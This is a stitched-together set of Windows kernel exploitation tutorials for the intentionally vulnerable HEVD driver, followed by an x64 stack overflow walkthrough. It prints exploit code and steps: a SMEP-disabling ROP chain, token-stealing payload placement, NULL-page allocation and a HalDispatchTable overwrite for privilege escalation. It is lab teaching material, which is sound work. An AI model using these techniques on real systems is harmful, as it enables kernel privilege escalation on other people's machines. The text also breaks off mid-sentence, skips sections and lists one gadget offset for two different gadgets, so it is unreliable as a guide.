(0x00007FF68EFF11D0,0x0000000037ADB025,0xFFFFA30883DFE610,0x0000000080000005)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.
Stop error 0x000000fc indicates a ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY issue which is caused by a hardware mitigation called SMEP (Supervisor Mode Execution Prevention).
Continueing execution results in this lovely screen…
1. So what’s SMEP?
SMEP (Supervisor Mode Execution Prevention) is a hardware mitigation introducted by Intel (branded as “OS Guard”) that restricts executing code that lies in usermode to be executed with Ring-0 privileges, attempts result in a crash. This basically prevents EoP exploits that rely on executing a usermode payload from ever executing it.
The SMEP bit is bit 20 of the CR4 register, which Intel defines as:
CR4 — Contains a group of flags that enable several architectural extensions, and indicate operating system or executive support for specific processor capabilities.
Setting this bit to 1 enables SMEP, while setting it to 0 disables it (duh).
There are a few ways described in the reading material that allow you to bypass SMEP, I recommend reading them for better understanding. For this exploit we’ll use the first method described in j00ru’s blog:
Construct a ROP chain that reads the content of CR4, flips the 20th bit and writes the new value to CR4. With SMEP disabled, we can “safely” jump to our user-mode payload.
If reading and/or modifying the content is not possible, just popping a “working” value to CR4 register will work. While this is not exactly elegant or clean, it does the job.
Virtualization-based security (VBS)
Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly.
Gadgets we’ll be using all exist in ntoskrnl.exe which we’re able to get its base address using EnumDrivers (some say it’s not reliable but I didn’t run into issues, but given its behaviour isn’t publicly documented you better cross your fingers) or by calling NtQuerySystemInformation (you’ll need to export it first), we’ll be using the first approach.
LPVOIDaddresses[1000];DWORDneeded;EnumDeviceDrivers(addresses,1000,&needed);printf("[+] Address of ntoskrnl.exe: 0x%p\n",addresses[0]);
Okay, now that we have nt’s base address, we can rely on finding relative offsets to it for calculating the ROP chain’s gadgets.
I referred to ptsecurity’s post on finding the gadgets.
First gadget we need should allow us to pop a value into the cr4 registe. Once we find one, we’ll be able to figure out which register we need to control its content next.
kd> uf nt!KiConfigureDynamicProcessor
nt!KiConfigureDynamicProcessor:
fffff802`2cc36ba8 sub rsp,28h
fffff802`2cc36bac call nt!KiEnableXSave (fffff802`2cc2df48)
fffff802`2cc36bb1 add rsp,28h
fffff802`2cc36bb5 ret
kd> uf fffff802`2cc2df48
nt!KiEnableXSave:
fffff802`2cc2df48 mov rcx,cr4
fffff802`2cc2df4b test qword ptr [nt!KeFeatureBits (fffff802`2cc0b118)],800000h
... snip ...
nt!KiEnableXSave+0x39b0:
fffff802`2cc318f8 btr rcx,12h
fffff802`2cc318fd mov cr4,rcx // First gadget!
fffff802`2cc31900 ret
kd> ? fffff802`2cc318fd - nt
Evaluate expression: 4341861 = 00000000`00424065
Gadget #1 is mov cr4,rcx at nt + 0x424065!
Now we need a way to control rcx’s content, ptsecurity’s post mentions HvlEndSystemInterrupt as a good target:
+------------------+
|pop rcx; ret | // nt + 0x424065
+------------------+
|value of rcx | // ? @cr4 & FFFFFFFF`FFEFFFFF
+------------------+
|mov cr4, rcx; ret | // nt + 0x424065
+------------------+
|addr of payload | // Available from user-mode
+------------------+
It’s extremely important to notice that writing more than 8 bytes starting the RIP offset means the next stack frame gets corrupted. Returning to
3. Restoring execution flow
Let’s take one more look on the stack call BEFORE the memset call:
Pitfall 1: returning to StackOverflowIoctlHandler+0x1a
Although adjusting the stack to return to this call works, a parameter on the stack (Irp’s address) gets overwritten thanks to the ROP chain and is not recoverable as far as I know. This results in an access violation later on.
Assembly at TriggerStackOverflow+0xbc:
fffff801`710256f4 lea r11,[rsp+820h]
fffff801`710256fc mov rbx,qword ptr [r11+10h] // RBX should contain Irp's address, this is now overwritten to the new cr4 value
This results in rbx (previously holding Irp’s address for IrpDeviceIoCtlHandler call) to hold the new cr4 address and later on being accessed, results in a BSOD.
fffff801`f88d63e0 and qword ptr [rbx+38h],0 ds:002b:00000000`000706b0=????????????????
Notice that rbx holds cr4’s new value. This instructions maps to
You can make rbx point to some writable location but good luck having a valid Irp struct that passes the following call.
// Complete the request
IoCompleteRequest(Irp,IO_NO_INCREMENT);
Another dead end.
Pitfall 3: More access violations
Now we go one more level up the stack, to nt!IofCallDriver+0x59. Jumping to this code DOES work but still, access violation in nt occurs.
It’s extremely important (and I mean it) to take note of all the registers how they behave when you make the IOCTL code in both a normal (non-exploiting) and exploitable call.
In our case, rdi and rsi registers are the offending ones. Unluckily for us, in x64, parameters are passed in registers and those two registers get populated in HEVD!TriggerStackOverflow.
fffff800`185756f4 lea r11,[rsp+820h]
fffff800`185756fc mov rbx,qword ptr [r11+10h]
fffff800`18575700 mov rsi,qword ptr [r11+18h] // Points to our first gadget
fffff800`18575704 mov rsp,r11
fffff800`18575707 pop rdi // Points to our corrupted buffer ("AAAAAAAA")
fffff800`18575708 ret
Now those two registers are both set to zero if you submit an input buffer that doesn’t result in a RET overwrite (you can check this by sending a small buffer and checking the registers contents before you return from TriggerStackOverflow). This is no longer the case when you mess up the stack.
Now sometime after hitting nt!IofCallDriver+0x59
kd> u @rip
nt!ObfDereferenceObject+0x5:
fffff800`152381c5 mov qword ptr [rsp+10h],rsi
fffff800`152381ca push rdi
fffff800`152381cb sub rsp,30h
fffff800`152381cf cmp dword ptr [nt!ObpTraceFlags (fffff800`15604004)],0
fffff800`152381d6 mov rsi,rcx
fffff800`152381d9 jne nt!ObfDereferenceObject+0x160d16 (fffff800`15398ed6)
fffff800`152381df or rbx,0FFFFFFFFFFFFFFFFh
fffff800`152381e3 lock xadd qword ptr [rsi-30h],rbx
kd> ? @rsi
Evaluate expression: -8795734228891 = fffff800`1562c065 // Address of mov cr4,rcx instead of 0
kd> ? @rdi
Evaluate expression: 4702111234474983745 = 41414141`41414141 // Some offset from our buffer instead of 0
Now that those registers are corrupted, we can just reset their expected value (zeroeing them out) sometime before this code is ever hit. A perfect place for this is after we execute our token stealing payload.
xor rsi, rsi
xor rdi, rdi
Last step would be adjusting the stack properly to point to nt!IofCallDriver+0x59’s stack frame by adding 0x40 to rsp.
This part shows how to exploit a vanilla integer overflow vulnerability. Post builds up on lots of contents from part 3 & 4 so this is a pretty short one.
NTSTATUSTriggerIntegerOverflow(INPVOIDUserBuffer,INSIZE_TSize){ULONGCount=0;NTSTATUSStatus=STATUS_SUCCESS;ULONGBufferTerminator=0xBAD0B0B0;ULONGKernelBuffer[BUFFER_SIZE]={0};SIZE_TTerminatorSize=sizeof(BufferTerminator);PAGED_CODE();__try{// Verify if the buffer resides in user mode
ProbeForRead(UserBuffer,sizeof(KernelBuffer),(ULONG)__alignof(KernelBuffer));DbgPrint("[+] UserBuffer: 0x%p\n",UserBuffer);DbgPrint("[+] UserBuffer Size: 0x%X\n",Size);DbgPrint("[+] KernelBuffer: 0x%p\n",&KernelBuffer);DbgPrint("[+] KernelBuffer Size: 0x%X\n",sizeof(KernelBuffer));#ifdef SECURE
// Secure Note: This is secure because the developer is not doing any arithmetic
// on the user supplied value. Instead, the developer is subtracting the size of
// ULONG i.e. 4 on x86 from the size of KernelBuffer. Hence, integer overflow will
// not occur and this check will not fail
if(Size>(sizeof(KernelBuffer)-TerminatorSize)){DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n",Size);Status=STATUS_INVALID_BUFFER_SIZE;returnStatus;}#else
DbgPrint("[+] Triggering Integer Overflow\n");// Vulnerability Note: This is a vanilla Integer Overflow vulnerability because if
// 'Size' is 0xFFFFFFFF and we do an addition with size of ULONG i.e. 4 on x86, the
// integer will wrap down and will finally cause this check to fail
if((Size+TerminatorSize)>sizeof(KernelBuffer)){DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n",Size);Status=STATUS_INVALID_BUFFER_SIZE;returnStatus;}#endif
// Perform the copy operation
while(Count<(Size/sizeof(ULONG))){if(*(PULONG)UserBuffer!=BufferTerminator){KernelBuffer[Count]=*(PULONG)UserBuffer;UserBuffer=(PULONG)UserBuffer+1;Count++;}else{break;}}}__except(EXCEPTION_EXECUTE_HANDLER){Status=GetExceptionCode();DbgPrint("[-] Exception Code: 0x%X\n",Status);}returnStatus;}
Like the comment says, this is a vanilla integer overflow vuln caused by the programmer not considering a very large buffer size being passed to the driver. Any size from 0xfffffffc to ``0xffffffff` will cause this check to be bypassed. Notice that the copy operation terminates if the terminator value is encountered (has to be 4-bytes aligned though), so we don’t need to submit a buffer length of size equal to the one we pass.
Exploitability on 64-bit
The InBufferSize parameter passed to DeviceIoControl is a DWORD, meaning it’s always of size 4 bytes. In the 64-bit driver, the following code does the comparison:
Comparison is done with 64-bit registers (no prefix/suffix was used to cast them to their 32-bit representation). This way, r11 will never overflow as it’ll be just set to 0x100000003, meaning that this vulnerability is not exploitable on 64-bit machines.
Update: I didn’t realize it at first, but the reason those values are treated fine in x64 arch is that all of them are of size_t.
2. Controlling execution flow
First, we need to figure out the offset for EIP. Sending a small buffer and calculating the offset between the kernel buffer address and the return address will do:
Notice that you need to have the terminator value 4-bytes aligned as otherwise it will use the submitted Size parameter which will ultimately result in reading beyond the buffer and possibly causing an access violation.
Now we know that RET is at offset 2088. The terminator value should be at 2088 + 4.
char*uBuffer=(char*)VirtualAlloc(NULL,2088+4+4,// EIP offset + 4 bytes for EIP + 4 bytes for terminator
MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);// Constructing buffer
RtlFillMemory(uBuffer,SIZE,'A');// Overwriting EIP
DWORD*payload_address=(DWORD*)(uBuffer+SIZE-8);*payload_address=(DWORD)&StealToken;// Copying terminator value
RtlCopyMemory(uBuffer+SIZE-4,terminator,4);
That’s pretty much it! At the end of the payload (StealToken) you need to make up for the missing stack frame by calling the remaining instructions (explained in detail in part 3).
Handle all code paths that deal with arithmetics with extreme care (especially when they’re user-supplied). Check operants/result for overflow/underflow condition.
Use an integer type that will be able to hold all possible outputs of the addition, although this might not be always possible.
Vulnerability was not exploitable on 64-bit systems due to the way the comparison takes place between two 64-bit registers and the maximum value passed to DeviceIoControl will never overflow.
Submitted buffer had to contain a 4-byte terminator value. This is the simplest form of crafting a payload that needs to meet certain criteria.
Although our buffer wasn’t of extreme size, “lying” about its length to the driver was possible.
Heaps are dynamically allocated memory regions, unlike the stack which is statically allocated and is of a defined size.
Heaps allocated for kernel-mode components are called pools and are divided into two main types:
Non-paged pool: These are guaranteed to reside in the RAM at all time, and are mostly used to store data that may get accessed in case of a hardware interrupt (at that point, the system can’t handle page faults). Allocating such memory can be done through the driver routine ExAllocatePoolWithTag.
Paged pool: This memory allocation can be paged in and out the paging file, normally on the root installation of Windows (Ex: C:\pagefile.sys).
Allocating such memory can be done through the driver routine ExAllocatePoolWithTag and specifying the poolType and a 4 byte “tag”.
NTSTATUSTriggerNullPointerDereference(INPVOIDUserBuffer){ULONGUserValue=0;ULONGMagicValue=0xBAD0B0B0;NTSTATUSStatus=STATUS_SUCCESS;PNULL_POINTER_DEREFERENCENullPointerDereference=NULL;PAGED_CODE();__try{// Verify if the buffer resides in user mode
ProbeForRead(UserBuffer,sizeof(NULL_POINTER_DEREFERENCE),(ULONG)__alignof(NULL_POINTER_DEREFERENCE));// Allocate Pool chunk
NullPointerDereference=(PNULL_POINTER_DEREFERENCE)ExAllocatePoolWithTag(NonPagedPool,sizeof(NULL_POINTER_DEREFERENCE),(ULONG)POOL_TAG);if(!NullPointerDereference){// Unable to allocate Pool chunk
DbgPrint("[-] Unable to allocate Pool chunk\n");Status=STATUS_NO_MEMORY;returnStatus;}else{DbgPrint("[+] Pool Tag: %s\n",STRINGIFY(POOL_TAG));DbgPrint("[+] Pool Type: %s\n",STRINGIFY(NonPagedPool));DbgPrint("[+] Pool Size: 0x%X\n",sizeof(NULL_POINTER_DEREFERENCE));DbgPrint("[+] Pool Chunk: 0x%p\n",NullPointerDereference);}// Get the value from user mode
UserValue=*(PULONG)UserBuffer;DbgPrint("[+] UserValue: 0x%p\n",UserValue);DbgPrint("[+] NullPointerDereference: 0x%p\n",NullPointerDereference);// Validate the magic value
if(UserValue==MagicValue){NullPointerDereference->Value=UserValue;NullPointerDereference->Callback=&NullPointerDereferenceObjectCallback;DbgPrint("[+] NullPointerDereference->Value: 0x%p\n",NullPointerDereference->Value);DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n",NullPointerDereference->Callback);}else{DbgPrint("[+] Freeing NullPointerDereference Object\n");DbgPrint("[+] Pool Tag: %s\n",STRINGIFY(POOL_TAG));DbgPrint("[+] Pool Chunk: 0x%p\n",NullPointerDereference);// Free the allocated Pool chunk
ExFreePoolWithTag((PVOID)NullPointerDereference,(ULONG)POOL_TAG);// Set to NULL to avoid dangling pointer
NullPointerDereference=NULL;}#ifdef SECURE
// Secure Note: This is secure because the developer is checking if
// 'NullPointerDereference' is not NULL before calling the callback function
if(NullPointerDereference){NullPointerDereference->Callback();}#else
DbgPrint("[+] Triggering Null Pointer Dereference\n");// Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
// because the developer is not validating if 'NullPointerDereference' is NULL
// before calling the callback function
NullPointerDereference->Callback();#endif
}__except(EXCEPTION_EXECUTE_HANDLER){Status=GetExceptionCode();DbgPrint("[-] Exception Code: 0x%X\n",Status);}returnStatus;}
Non-paged pool memory is allocated of size NULL_POINTER_DEREFERENCE with 4-bytes tag of value kcaH. NULL_POINTER_DEREFERENCEstruct contains two fields:
The size of this struct is 8 bytes on x86 and contains a function pointer. If the user-supplied buffer contains MagicValue, the function pointer NullPointerDereference->Callback will point to NullPointerDereferenceObjectCallback. But what happens if we don’t submit that value?
In that case, the pool memory gets freed and NullPointerDereference is set to NULL to avoid a dangling pointer. But this is only as good as validation goes, so everytime you use that pointer you need to check if it’s NULL, just setting it to NULL and not performing proper validation could be disastrous, like in this example. In our case, the Callback is called without validating if this inside a valid struct, and it ends up reading from the NULL page (first 64K bytes) which resides in usermode.
In this case, NullPointerDereference is just a struct at 0x00000000 and NullPointerDereference->Callback() calls whatever is at address 0x00000004. How are we going to exploit this?
The exploit will do the following:
Allocate the NULL page.
Put the address of the payload at 0x4.
Trigger the NULL page dereferencing through the driver IOCTL.
Brief history on mitigation effort for NULL page dereference vulnerabilities
Before we continue, let’s discuss the efforts done in Windows to prevent attacks on NULL pointer dereference vulnerabilities.
EMET (Enhanced Mitigation Experience Toolkit), a security tool packed with exploit mitigations offered protection against NULL page dereference attacks by simply allocating the NULL page and marking it as “NOACCESS”. EMET is now deprecated and some parts of it are integrated into Windows 10, called Exploit Protection.
Starting Windows 8, allocating the first 64K bytes is prohibited. The only exception is by enabling NTVDM but this has been disabled by default.
Bottom line: vulnerability is not exploitable on our Windows 10 VM. If you really want to exploit it, enable NTVDM, then you’ll have to bypass SMEP (part 4 discussed this).
Before we talk with the driver, we need to allocate our NULL page and put the address of the payload at 0x4. Allocating the NULL page through VirtualAllocEx is not possible, instead, we can resolve the address of NtAllocateVirtualMemory in ntdll.dll and pass a small non-zero base address which gets rounded down to NULL.
To resolve the address of the function, we’ll use GetModuleHandle to get the address of ntdll.dll then GetProcAddress to get the process address.
typedefNTSTATUS(WINAPI*ptrNtAllocateVirtualMemory)(HANDLEProcessHandle,PVOID*BaseAddress,ULONGZeroBits,PULONGAllocationSize,ULONGAllocationType,ULONGProtect);ptrNtAllocateVirtualMemoryNtAllocateVirtualMemory=(ptrNtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");if(NtAllocateVirtualMemory==NULL){printf("[-] Failed to export NtAllocateVirtualMemory.");exit(-1);}
Next we need to allocate the NULL page:
// Copied and modified from http://www.rohitab.com/discuss/topic/34884-c-small-hax-to-avoid-crashing-ur-prog/
LPVOIDbaseAddress=(LPVOID)0x1;ULONGallocSize=0x1000;char*uBuffer=(char*)NtAllocateVirtualMemory(GetCurrentProcess(),&baseAddress,// Putting a small non-zero value gets rounded down to page granularity, pointing to the NULL page
0,&allocSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
To verify if that’s working, put a DebugBreak and check the memory content after writing some dummy value.
A nice way to verify the NULL page is allocated, is by calling VirtualProtect which queries/sets the protection flags on memory segments. VirtualProtect returning false means the NULL page was not allocated.
3. Controlling execution flow
Now we want to put our payload address at 0x00000004:
*(INT_PTR*)(uBuffer+4)=(INT_PTR)&StealToken;
Now create a dummy buffer to send to the driver and put a breakpoint at HEVD!TriggerNullPointerDereference + 0x114.
Finally, after executing the token stealing payload, a ret with no stack adjusting will do.
4. Porting to Windows 7 x64
To port the exploit, you only need to adjust the offset at which you write the payload address as the struct size becomes 16 bytes. Also don’t forget to swap out the payload.
NTSTATUSTriggerArbitraryOverwrite(INPWRITE_WHAT_WHEREUserWriteWhatWhere){PULONG_PTRWhat=NULL;PULONG_PTRWhere=NULL;NTSTATUSStatus=STATUS_SUCCESS;PAGED_CODE();__try{// Verify if the buffer resides in user mode
ProbeForRead((PVOID)UserWriteWhatWhere,sizeof(WRITE_WHAT_WHERE),(ULONG)__alignof(WRITE_WHAT_WHERE));What=UserWriteWhatWhere->What;Where=UserWriteWhatWhere->Where;DbgPrint("[+] UserWriteWhatWhere: 0x%p\n",UserWriteWhatWhere);DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n",sizeof(WRITE_WHAT_WHERE));DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n",What);DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n",Where);#ifdef SECURE
// Secure Note: This is secure because the developer is properly validating if address
// pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()
// routine before performing the write operation
ProbeForRead((PVOID)Where,sizeof(PULONG_PTR),(ULONG)__alignof(PULONG_PTR));ProbeForRead((PVOID)What,sizeof(PULONG_PTR),(ULONG)__alignof(PULONG_PTR));*(Where)=*(What);#else
DbgPrint("[+] Triggering Arbitrary Overwrite\n");// Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
// because the developer is writing the value pointed by 'What' to memory location
// pointed by 'Where' without properly validating if the values pointed by 'Where'
// and 'What' resides in User mode
*(Where)=*(What);#endif
}__except(EXCEPTION_EXECUTE_HANDLER){Status=GetExceptionCode();DbgPrint("[-] Exception Code: 0x%X\n",Status);}returnStatus;}
The vulnerability is obvious, TriggerArbitraryOverwrite allows overwriting a controlled value at a controlled address. This is very powerful, but can you come up with a way to exploit this without having another vulnerability?
Let’s consider some scenarios (that won’t work but are worth thinking about):
Overwrite a return address:
Needs an infoleak to reveal the stack layout or a read primitive.
Overwriting the process token with a SYSTEM one:
Need to know the EPROCESS address of the SYSTEM process.
Overwrite a function pointer called with kernel privileges:
Now that’s a good one, an excellent documentation on a reliable (11-years old!) technique is Exploiting Common Flaws in Drivers.
hal.dll, HalDispatchTable and function pointers
hal.dll stands for Hardware Abstraction Layer, basically an interface to interacting with hardware without worrying about hardware-specific details. This allows Windows to be portable.
HalDispatchTable is a table containing function pointers to HAL routines. Let’s examine it a bit with WinDBG.
First entry at HalDispatchTable doesn’t seem to be populated but HalDispatchTable+4 points to HaliQuerySystemInformation and HalDispatchTable+8 points to HalpSetSystemInformation.
These locations are writable and we can calculate their exact location easily (more on that later). HaliQuerySystemInformation is the lesser used one of the two, so we can put the address of our shellcode at HalDispatchTable+4 and make a user-mode call that will end up calling this function.
HaliQuerySystemInformation is called by the undocumented NtQueryIntervalProfile (which according to the linked article is a “very low demanded API”), let’s take a look with WinDBG:
Function at [nt!HalDispatchTable+0x4] gets called at nt!KeQueryIntervalProfile+0x23 which we can trigger from user-mode. Hopefully, we won’t run into any trouble overwriting that entry.
The exploit will do the following:
Get HalDispatchTable location in the kernel.
Overwrite HalDispatchTable+4 with the address of our payload.
Calculate the address of NtQueryIntervalProfile and call it.
2. Getting the address of HalDispatchTable
HalDispatchTable exists in the kernel executive (ntoskrnl or another instance depending on the OS/processor). To get its address we need to:
Get kernel’s base address in kernel using NtQuerySystemInformation.
Load kernel in usermode and get the offset to HalDispatchTable.
Add the offset to kernel’s base address.
SYSTEM_MODULEkrnlInfo=*getNtoskrnlInfo();// Get kernel base address in kernelspace
ULONGaddr_ntoskrnl=(ULONG)krnlInfo.ImageBaseAddress;printf("[+] Found address to ntoskrnl.exe at 0x%x.\n",addr_ntoskrnl);// Load kernel in use in userspace to get the offset to HalDispatchTable
// NOTE: DO NOT HARDCODE KERNEL MODULE NAME
printf("[+] Kernel in use: %s.\n",krnlInfo.Name);char*krnl_name=strrchr((char*)krnlInfo.Name,'\\')+1;HMODULEuser_ntoskrnl=LoadLibraryEx(krnl_name,NULL,DONT_RESOLVE_DLL_REFERENCES);if(user_ntoskrnl==NULL){printf("[-] Failed to load kernel image.\n");exit(-1);}printf("[+] Loaded kernel in usermode using LoadLibraryEx: 0x%x.\n",user_ntoskrnl);ULONGuser_HalDispatchTable=(ULONG)GetProcAddress(user_ntoskrnl,"HalDispatchTable");if(user_HalDispatchTable==NULL){printf("[-] Failed to locate HalDispatchTable.\n");exit(-1);}printf("[+] Found HalDispatchTable in usermode: 0x%x.\n",user_HalDispatchTable);// Calculate address of HalDispatchTable in kernelspace
ULONGaddr_HalDispatchTable=addr_ntoskrnl-(ULONG)user_ntoskrnl+user_HalDispatchTable;printf("[+] Found address to HalDispatchTable at 0x%x.\n",addr_HalDispatchTable);
3. Overwriting HalDispatchTable+4
To do this, we just need to submit a buffer that gets cast to WRITE_WHAT_WHERE. Basically two pointers, one for What and another for Where.
Like explained earlier, we need to call NtQueryIntervalProfile which address can be resolved from ntdll.dll.
// Trigger the payload by calling NtQueryIntervalProfile()
HMODULEntdll=GetModuleHandle("ntdll");PtrNtQueryIntervalProfile_NtQueryIntervalProfile=(PtrNtQueryIntervalProfile)GetProcAddress(ntdll,"NtQueryIntervalProfile");if(_NtQueryIntervalProfile==NULL){printf("[-] Failed to get address of NtQueryIntervalProfile.\n");exit(-1);}ULONGwhatever;_NtQueryIntervalProfile(2,&whatever);
The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and on the second part you can understand this vulnerability and find out how to exploit it.
This article will present a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. First part will cover the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part will detail how these vulnerabilities can be exploited.
ASM for x64
There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.
First of all, the registers are now the following:
The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP represent the last 4 bytes of the previously mentioned registers. They hold 32 bits of data.
There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
It is possible to use R8d, R9d etc. in order to access the last 4 bytes, as you can do it with EAX, EBX etc.
Pushing and poping data on the stack will use 64 bits instead of 32 bits
Calling convention
Another important difference is the way functions are called, the calling convention.
Here are the most important things we need to know:
First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
Similar to x86, the return value will be available in the RAX register.
The function caller will allocate stack space for the arguments used in registers (called “shadow space” or “home space”). Even if when a function is called the parameters are placed in registers, if the called function needs to modify the registers, it will need some space to store them, and this space will be the stack. The function caller will have to allocate this space before the function call and to deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
The stack has to be 16 bytes aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
Some registers are volatile and other are nonvolatile. This means that if we set some values into a register and call some function (e.g. Windows API) the volatile register will probably change while nonvolatile register will preserve their values.
More details about calling convention on Windows can be found here.
Function calling example
Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.
#include "stdafx.h"
int Add(longx, inty)
{
int z = x + y;
return z;
}
int main()
{
Add(3, 4);
return 0;
}
Here is a possible output, after removing all optimisations and security features.
Main function:
sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret
We can see the following:
sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
mov ecx,3 – The value of the first argument is place in ECX register.
call <consolex64.Add> – Call the “Add” function.
xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in ECX and EDX registers. But what if the function needs to use those registers (however, please note that some registers must be preserved by a function call, these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves on the shadow space the second argument (the value 4), from EDX register.
mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other function, so it is not needed to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes, it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
mov eax,ecx – Will save the same value (the sum) into EAX register.
mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
add rsp,18 – Cleanup the allocated stack space.
ret – Return from the function.
Exploitation
Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.
We have a 40 bytes buffer and a function that will copy some string on that buffer.
This will be the assembly code of the main function:
sub rsp,28 ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("test")
call <consolex64.Copy> ; Call the Copy function
xor eax,eax ; EAX = 0, return value
add rsp,28 ; Cleanup the stack space
ret ; return
And this will be the assembly code for the Copy function:
mov qword ptr ss:[rsp+8],rcx ; Save the RCX on the stack
sub rsp,58 ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy> ; Call strcpy function
add rsp,58 ; Cleanup the stack
ret ; Return from function
Let’s modify the Copy function call to the following:
Copy("1111111122222222333333334444444455555555");
The string has 40 bytes, and it will fit in our buffer (however, please not that strcpy will also place a NULL byte after our string, but this way it is easier to see the buffer on the stack).
This is how the stack will look like after the strcpy function call:
000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"000000000012FEB8 3232323232323232 ; "22222222"000000000012FEC0 3333333333333333 ; "33333333"000000000012FEC8 3434343434343434 ; "44444444"000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address
As you can probably see, we need to add extra 24 bytes to overwrite the return address: 16 bytes the unused stack space and 8 bytes for the return address. Let’s modify the Copy function call to the following:
This will overwrite the return address with “AAAAAAAA”.
NULL byte problem
In our case, a call to “strcpy” function will generate the vulnerability. What is important to understand, is that “strcpy” function will stop copying data when it will encounter first NULL byte. For us, this means that we cannot have NULL bytes in our payload.
This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:
If we would like to proceed like in the 32 bits example, we would have to overwrite the return address to an address such as 000000014000101C where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.
So, what can we do? We should find a workaround. A simple and useful trick that we can do is the following: we can partially overwrite the return address. So, instead of overwriting the whole 8 bytes of the address, we can overwrite only the last 4, 5 or 6 bytes. Let’s modify the function call to overwrite only the last 5 bytes, so we will just remove 3 “A”s from our payload. The function call will be the following:
Before the “RET” instruction, the stack will look like this:
000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address
As you can see, we are able to specify a valid address, so we solved our first issue. However, since we cannot add anything else after this, as we need NULL bytes to have a valid address, how can we exploit this vulnerability?
Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:
We can see that in the RAX register we can find the address where our payload is stored. This happens for a simple reason: strcpy function will copy the string to the buffer and it will return the address of the buffer. As we already know, the returned data from a function call will be saved in RAX register, so we will have access to our payload using RAX register.
Now, our exploitation is simple:
We have our payload address in RAX register
We find a “JMP RAX” instruction
We specify the address of that instruction as return address
We can easily find some “JMP RAX” instructions:
We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:
56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
4 bytes of return address, the “JMP RAX” instruction that we previously found
